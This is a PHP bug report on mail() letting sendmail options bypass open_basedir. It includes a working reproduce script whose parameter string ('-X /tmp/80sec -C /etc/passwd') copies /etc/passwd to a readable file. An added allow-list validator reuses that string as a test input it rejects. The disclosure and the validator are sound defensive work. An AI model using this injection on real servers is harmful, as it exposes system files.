Bug #48229 mail() function open_basedir bypass
Submitted: 2009-05-11 02:35 UTC Modified: 2009-05-11 09:32 UTC
From: root at 80sec dot com Assigned:
Status: Not a bug Package: Safe Mode/open_basedir
PHP Version: 5.2.9 OS: linux
Private report: No CVE-ID: None
 [2009-05-11 02:35 UTC] root at 80sec dot com
Description:
------------
The mail function may bypass open_basedir or read/write arbitrary
 files.

Reproduce code:
---------------
<?php
$to = 'jianxin@80sec.com'.str_repeat("x",10000);
$subject = 'the subject'.str_repeat("x",10);
$message = 'hello'.str_repeat("x",10);
$headers = ''; // undefined in the report as submitted; set so the call runs without a notice
mail($to, $subject, $message, $headers,"-v -bt -X /tmp/80sec -d13 -C /etc/passwd");
?>

Expected result:
----------------
We can get the contents of /etc/passwd in /tmp/80sec.

Actual result:
--------------
We can get the contents of /etc/passwd in /tmp/80sec.

 [2009-05-11 09:32 UTC] jani@php.net
Enable safe-mode.
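
The report hinges on the fifth argument of mail(), which PHP hands to the sendmail binary as command-line options. An application-level allow-list for that argument follows as an added example; it is not part of the bug report or of PHP itself, and safe_mail(), validate_mail_params() and the "-f only" policy are hypothetical names and assumptions chosen for illustration.

```php
<?php
// Added example, not PHP's own code. Requires PHP 7+ for scalar type hints.
// Policy (assumption): the only sendmail option the application ever needs
// is an envelope sender, "-f<address>". Any other option, including the
// -X, -C, -d and -bt options used in the report, is refused.

function validate_mail_params(string $params): string
{
    if ($params === '') {
        return '';
    }
    // Exactly one token: "-f" plus a conservative address pattern.
    // No whitespace is allowed, so a second option cannot be appended.
    if (!preg_match('/\A-f[A-Za-z0-9._+-]+@[A-Za-z0-9.-]+\z/', $params)) {
        throw new InvalidArgumentException('mail() extra parameters rejected');
    }
    return $params;
}

// Hypothetical wrapper: application code calls this instead of mail().
function safe_mail(string $to, string $subject, string $message,
                   string $headers = '', string $params = ''): bool
{
    return mail($to, $subject, $message, $headers,
                validate_mail_params($params));
}

// Constructed sample inputs: the report's parameter string, a benign
// envelope sender, and a benign sender with an extra option appended.
$samples = [
    '-v -bt -X /tmp/80sec -d13 -C /etc/passwd',
    '-fbounce@example.com',
    '-fbounce@example.com -X /tmp/log',
];

foreach ($samples as $s) {
    try {
        validate_mail_params($s);
        echo "allowed:  $s\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: $s\n";
    }
}
```

The loop only exercises the validator, so no mail is sent when the file is run from the command line.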
 